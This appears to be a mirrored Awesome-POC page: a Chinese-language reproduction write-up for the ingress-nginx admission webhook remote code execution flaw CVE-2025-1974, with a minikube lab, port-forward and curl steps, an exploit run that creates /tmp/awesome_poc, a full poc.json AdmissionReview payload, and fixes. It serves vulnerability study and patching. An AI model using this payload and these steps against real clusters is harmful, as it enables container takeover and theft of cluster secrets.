admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-07 11:58:05 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/云安全漏洞/Kubernetes Ingress-nginx admission 远程代码执行漏洞 CVE-2025-1974.md
Threekiii ad0e23d14b update
2025-04-14 17:53:04 +08:00

194 lines
6.4 KiB
Markdown
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Kubernetes Ingress-nginx admission 远程代码执行漏洞 CVE-2025-1974
## 漏洞描述
Ingress-nginx 是 Kubernetes 集群内服务对外暴露的访问接入点,用于承载集群内服务访问流量。其小于 1.12.1 的旧版本中Kubernetes Ingress-nginx admission 控制器存在一个配置注入漏洞,已获取集群网络访问权限的远程攻击者,可以通过 `ValidatingAdmissionWebhook` 提交一个配置文件进行验证,并在配置文件中插入恶意配置,实现远程代码执行,导致 Ingress-nginx 所在容器被攻击者控制,并可能导致集群内的 Secrets 泄漏。
参考链接:
- https://github.com/kubernetes/kubernetes/issues/131009
- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-1974
- https://github.com/sandumjacob/IngressNightmare-POCs
- CVE-2025-24513: [kubernetes/kubernetes#131005](https://github.com/kubernetes/kubernetes/issues/131005)
- CVE-2025-24514: [kubernetes/kubernetes#131006](https://github.com/kubernetes/kubernetes/issues/131006)
- CVE-2025-1097: [kubernetes/kubernetes#131007](https://github.com/kubernetes/kubernetes/issues/131007)
- CVE-2025-1098: [kubernetes/kubernetes#131008](https://github.com/kubernetes/kubernetes/issues/131008)
- CVE-2025-1974: [kubernetes/kubernetes#131009](https://github.com/kubernetes/kubernetes/issues/131009)
- https://www.wiz.io/blog/ingress-nginx-kubernetes-vulnerabilities
## 漏洞影响
```
Ingress-nginx < v1.11.0
Ingress-nginx v1.11.0 - 1.11.4
Ingress-nginx v1.12.0
```
## 环境搭建
安装 minikube 和 kubectl
- [minikube](https://minikube.sigs.k8s.io/docs/start/)
- [kubectl](https://kubernetes.io/docs/reference/kubectl/)
启动 minikube本环境的 minikube、kubectl、Kubernetes Server 版本如下:
```
minikube version
-----
minikube version: v1.33.1
commit: 5883c09216182566a63dff4c326a6fc9ed2982ff
```
```
kubectl version
-----
Client Version: v1.30.1
Kustomize Version: v5.0.4-0.20230601165947-6ce0bf390ce3
Server Version: v1.30.0
```
下载 Kubernetes Ingress-nginx 1.11.3 的 [deploy.yaml](https://github.com/kubernetes/ingress-nginx/blob/f6456ea86c6c330e7cf401ade70ce1faa757265b/deploy/static/provider/cloud/deploy.yaml),通过 kubectl 部署资源:
```
kubectl apply -f deploy.yaml
```
部署完成后,可执行以下命令查看 ingress-nginx 命名空间中的 pod
```
kubectl get pods -n ingress-nginx
-----
NAME READY STATUS RESTARTS AGE
ingress-nginx-admission-create-jmw9x 0/1 Completed 0 24m
ingress-nginx-admission-patch-jbxj6 0/1 Completed 1 24m
ingress-nginx-controller-869748796c-p4jvj 1/1 Running 0 24m
```
![](images/Kubernetes%20Ingress-nginx%20admission%20远程代码执行漏洞%20CVE-2025-1974/image-20250413172307109.png)
## 漏洞复现
查看 webhook 服务器信息,显示服务器正在监听 8443 端口:
```
kubectl describe pod ingress-nginx-controller-869748796c-p4jvj -n ingress-nginx
-----
--validating-webhook=:8443
```
![](images/Kubernetes%20Ingress-nginx%20admission%20远程代码执行漏洞%20CVE-2025-1974/image-20250413172648584.png)
使用端口转发访问 webhook 端口:
```
kubectl port-forward -n ingress-nginx ingress-nginx-controller-869748796c-p4jvj 1337:8443
```
![](images/Kubernetes%20Ingress-nginx%20admission%20远程代码执行漏洞%20CVE-2025-1974/image-20250413172813574.png)
此时,我们已将易受攻击的 webhook 服务器从 pod 转发到本地机器的本地端口 1337。执行 [poc](https://github.com/sandumjacob/IngressNightmare-POCs),发送包含 nginx 配置的 AdmissionRequest
```
curl --insecure -v -H "Content-Type: application/json" --data @poc.json https://localhost:1337/fake/path
```
![](images/Kubernetes%20Ingress-nginx%20admission%20远程代码执行漏洞%20CVE-2025-1974/image-20250413173013506.png)
查看日志,以确保执行成功:
```
kubectl logs ingress-nginx-controller-869748796c-p4jvj -n ingress-nginx
```
![](images/Kubernetes%20Ingress-nginx%20admission%20远程代码执行漏洞%20CVE-2025-1974/image-20250413173205563.png)
CVE-2025-1974 可以与其他漏洞组合利用:
- CVE-2025-1974 + CVE-2025-24514 → auth-url injection → RCE
- CVE-2025-1974 + CVE-2025-1097 → auth-tls-match-cn injection → RCE
- CVE-2025-1974 + CVE-2025-1098→ mirror UID injection → RCE
本地测试,将端口转发到 `localhost`
```
kubectl port-forward svc/ingress-nginx-controller -n ingress-nginx 8080:80
kubectl port-forward -n ingress-nginx svc/ingress-nginx-controller-admission 8443:443
```
执行命令 `touch /tmp/awesome_poc`
```
./exp -m c -c 'touch /tmp/awesome_poc' -i https://localhost:8443/networking/v1/ingresses -u http://localhost:8080/fake/addr
```
![](images/Kubernetes%20Ingress-nginx%20admission%20远程代码执行漏洞%20CVE-2025-1974/image-20250414173754627.png)
![](images/Kubernetes%20Ingress-nginx%20admission%20远程代码执行漏洞%20CVE-2025-1974/image-20250414173824804.png)
## 漏洞 POC
poc.json
```json
{
"apiVersion": "admission.k8s.io/v1",
"kind": "AdmissionReview",
"request": {
"kind": {
"group": "networking.k8s.io",
"version": "v1",
"kind": "Ingress"
},
"resource": {
"group": "",
"version": "v1",
"resource": "namespaces"
},
"operation": "CREATE",
"object": {
"metadata": {
"name": "deads",
"annotations": {
"nginx.ingress.kubernetes.io/mirror-host": "test"
}
},
"spec": {
"rules": [
{
"host": "jacobsandum.com",
"http": {
"paths": [
{
"path": "/",
"pathType": "Prefix",
"backend": {
"service": {
"name": "kubernetes",
"port": {
"number": 80
}
}
}
}
]
}
}
],
"ingressClassName": "nginx"
}
}
}
}
```
## 漏洞修复
- 更新至 1.11.5 或 1.12.1 及其以上版本。
- 确保 admission webhook 端点没有暴露在外。
缓解措施:
- 使用 `controller.admissionWebhooks.enabled=false` 参数重新安装 ingress-nginx
- 删除名为 `ingress-nginx-admission` 的 `ValidatingWebhookConfiguration` ,并从 `ingress-nginx-controller` 容器的 Deployment 或 DaemonSet 中删除 `--validating-webhook` 参数。
Reference in New Issue View Git Blame Copy Permalink